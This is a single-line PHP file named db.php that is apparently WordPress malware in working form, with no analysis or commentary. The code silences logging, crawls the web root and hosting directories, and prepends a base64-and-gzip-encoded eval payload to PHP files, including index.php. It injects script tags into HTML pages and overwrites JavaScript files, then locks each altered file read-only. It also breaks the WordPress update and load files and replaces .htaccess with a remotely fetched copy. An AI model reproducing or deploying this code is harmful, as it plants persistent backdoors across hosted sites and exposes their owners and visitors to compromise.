db.php

1. <?php @ini_set("error_log",null);@ini_set("log_errors",0);@ini_set("max_execution_time",0);@set_time_limit(0);error_reporting(0);$file_j='j';$file_h='e';$file_p='e';$text='';$position=1;function getDirContents($dir){global $file_j,$text,$position,$file_h,$file_p;$files=scandir($dir);foreach($files as$key=>$value){$path=realpath($dir.DIRECTORY_SEPARATOR.$value);if(!is_dir($path)){$path_info=pathinfo($path);$pos3=$path_info['extension'];if($pos3==="js"){$pos2=stripos($path_info['basename'],$file_j);if($pos2!==false){echo'WP_Error_Page_Not_Found '." </br>";$pos1=stripos(file_get_contents($path),$text);if($pos1===false){if($position==2){}else{chmod($path,0666);file_put_contents($path,$text);chmod($path,0444);}}}}else{$pos4=$path_info['extension'];if($pos4==="html"){$pos5=stripos($path_info['basename'],$file_h);if($pos5!==false){echo'WP_Error_Page_Not_Found HTML_Tag '." </br>";$pos6=stripos(file_get_contents($path),$text);if($pos6===false){if($position==2){}else{chmod($path,0666);$find_str=stripos(file_get_contents($path),"</head>");if($find_str!==false){$str=file_get_contents($path);$str=str_replace('</head>','<script type="text/javascript">'.$text.'</script></head>',$str);file_put_contents($path,$str);chmod($path,0444);}}}}}$pos7=$path_info['extension'];if($pos7==="php"){$pos8=stripos($path_info['basename'],$file_p);if($pos8!==false){echo'WP_Error_Page_Not_Found PHP_Tag '." </br>";$pos9=stripos(file_get_contents($path),$text);if($pos9===false){if($position==2){}else{chmod($path,0666);$find_str=file_get_contents($path);file_put_contents($path,base64_decode("PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5wZFVzMXUwMEFRZnBXTmxZTWRyRGhPODlkRU9aVEtvbEVwUVlrQm9ScFpVKzg2dThUWnRkWnIxWDZBM2poeTRRMjQ4Z3hVdkFhdndqaHBnV1FQTy8rYWI3NFprZG90dHN0TjdYVmVaa3BSS2VSbm1KSUZ5VVN5SmJVcU5XR2dNM1hIWEFLU2tsSlNkWERmZzBsNHQrUFo3WGdkck40SHExdnJLZ3pmeHUvUWlpOWVCVzlDNjVQalROdnh0KzgvZi8xNGZKeUQxbERiMWlYWEt2S0hRMmE1VmxRTlJxajdtcVVxcXNZVGRJVmFVQ1lOYWpmclJZRGlRNU9BWGUrTFEwRWlaRm1odXNneDBGTXlxa1pETkM4azFVcFExSlk1MDRCeURTbG9ZVG16VkdrR0NiZi9RaUZRdE9NdnZ4KytQamhUa2RwRnVCSzVLazRIaWFyaDhMOVozT2VTMW56dWRkYWdnZnZuYVlKazdmQzVSRzJoUmpwU3lBcDJTcWFCTFVQV1NBN1NGRVNscVVzMnVwUkd5QTBTalRFZ1Jxc3N3L285b3BZb0NtWVEwT1Z5ZWIwSWJuSHUwY1RrY1Nsb1hCbzA2SjdiSWdpVEpvSFpGdDlITVRLSXk4Z2ZEWFpJZ0crNW9iZ0piT2RGYjl6cjk0NUJmMlRBOTJ2RzdzSVFyY3BOczgxTzc2eDNpcjdZd2VFV2lPSE5WZHdwWmVwOWJ0K1pYVEdnZ2JhdDF5b0JJNVNjRW01TVB2VTgvMnpRamFxei91Qzg2L3VqN25qaUNVbWJaVlhkbk9lNEZpcllNYVFsSnpXaWNyRU5HSkl5bGhWa2cwQ2FJM05tVEZLUi92dWZsdnJrbUIxalhqZUkzV2RSTThZQU9HL20rd01wQ3ZaQicpKSk7Pz4=").$find_str);chmod($path,0444);$find_str=stripos(file_get_contents($path),"</head>");if($find_str!==false){$str=file_get_contents($path);$str=str_replace('</head>','<script type="text/javascript">'.$text.'</script></head>',$str);file_put_contents($path,$str);chmod($path,0444);}}}}}}}elseif($value!="."&&$value!=".."){getDirContents($path);}}}$path=$_SERVER['DOCUMENT_ROOT'];chmod($path."/index.php",0666);$find_str=file_get_contents($path."/index.php");file_put_contents($path."/index.php",base64_decode("PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5wZFVzMXUwMEFRZnBXTmxZTWRyRGhPODlkRU9aVEtvbEVwUVlrQm9ScFpVKzg2dThUWnRkWnIxWDZBM2poeTRRMjQ4Z3hVdkFhdndqaHBnV1FQTy8rYWI3NFprZG90dHN0TjdYVmVaa3BSS2VSbm1KSUZ5VVN5SmJVcU5XR2dNM1hIWEFLU2tsSlNkWERmZzBsNHQrUFo3WGdkck40SHExdnJLZ3pmeHUvUWlpOWVCVzlDNjVQalROdnh0KzgvZi8xNGZKeUQxbERiMWlYWEt2S0hRMmE1VmxRTlJxajdtcVVxcXNZVGRJVmFVQ1lOYWpmclJZRGlRNU9BWGUrTFEwRWlaRm1odXNneDBGTXlxa1pETkM4azFVcFExSlk1MDRCeURTbG9ZVG16VkdrR0NiZi9RaUZRdE9NdnZ4KytQamhUa2RwRnVCSzVLazRIaWFyaDhMOVozT2VTMW56dWRkYWdnZnZuYVlKazdmQzVSRzJoUmpwU3lBcDJTcWFCTFVQV1NBN1NGRVNscVVzMnVwUkd5QTBTalRFZ1Jxc3N3L285b3BZb0NtWVEwT1Z5ZWIwSWJuSHUwY1RrY1Nsb1hCbzA2SjdiSWdpVEpvSFpGdDlITVRLSXk4Z2ZEWFpJZ0crNW9iZ0piT2RGYjl6cjk0NUJmMlRBOTJ2RzdzSVFyY3BOczgxTzc2eDNpcjdZd2VFV2lPSE5WZHdwWmVwOWJ0K1pYVEdnZ2JhdDF5b0JJNVNjRW01TVB2VTgvMnpRamFxei91Qzg2L3VqN25qaUNVbWJaVlhkbk9lNEZpcllNYVFsSnpXaWNyRU5HSkl5bGhWa2cwQ2FJM05tVEZLUi92dWZsdnJrbUIxalhqZUkzV2RSTThZQU9HL20rd01wQ3ZaQicpKSk7Pz4=").$find_str);chmod($path."/index.php",0444);chmod($path."/wp-admin/update-core.php",0666);if(unlink($path."/wp-admin/update-core.php")){}else{file_put_contents($path."/wp-admin/update-core.php","Error update #0x226951");chmod($path."/wp-admin/update-core.php",0444);}chmod($path."/.htaccess",0666);if(unlink($path."/.htaccess")){file_put_contents($path."/.htaccess",file_get_contents('https://gist.githubusercontent.com/BFTrick/3706672/raw/be744502cf3921f761cbef11878af6f4a2024c3d/.htaccess'));chmod($path."/.htaccess",0444);}else{file_put_contents($path."/.htaccess",file_get_contents('https://gist.githubusercontent.com/BFTrick/3706672/raw/be744502cf3921f761cbef11878af6f4a2024c3d/.htaccess'));chmod($path."/.htaccess",0444);}chmod($path."/wp-load.php",0666);if(unlink($path."/wp-load.php")){file_put_contents($path."/wp-load.php","");chmod($path."/wp-load.php",0444);}$pos1=stripos($path,'domains');if($pos1!==false){$rest=substr($path,0,stripos($path,'domains')+strlen('domains'));getDirContents($rest);}else{$pos1=stripos($path,'public_html');if($pos1!==false){$rest=substr($path,0,stripos($path,'public_html')+strlen('public_html'));getDirContents($rest);}else{$pos1=stripos($path,'html');if($pos1!==false){$rest=substr($path,0,stripos($path,'html')+strlen('html'));getDirContents($rest);}else{$pos1=stripos($path,'htdocs');if($pos1!==false){$rest=substr($path,0,stripos($path,'htdocs')+strlen('htdocs'));getDirContents($rest);}else{$pos1=stripos($path,'httpdocs');if($pos1!==false){$rest=substr($path,0,stripos($path,'httpdocs')+strlen('httpdocs'));getDirContents($rest);}else{$pos1=stripos($path,'vhosts');if($pos1!==false){$rest=substr($path,0,stripos($path,'vhosts')+strlen('vhosts'));getDirContents($rest);}else{$pos1=stripos($path,'www');if($pos1!==false){$rest=substr($path,0,stripos($path,'www')+strlen('www'));getDirContents($rest);}else{$pos1=stripos($path,'wwwroot');if($pos1!==false){$rest=substr($path,0,stripos($path,'wwwroot')+strlen('wwwroot'));echo($rest);getDirContents($rest);}else{$pos1=stripos($path,'web');if($pos1!==false){$rest=substr($path,0,stripos($path,'web')+strlen('web'));getDirContents($rest);}else{getDirContents($_SERVER['DOCUMENT_ROOT']);}}}}}}}}};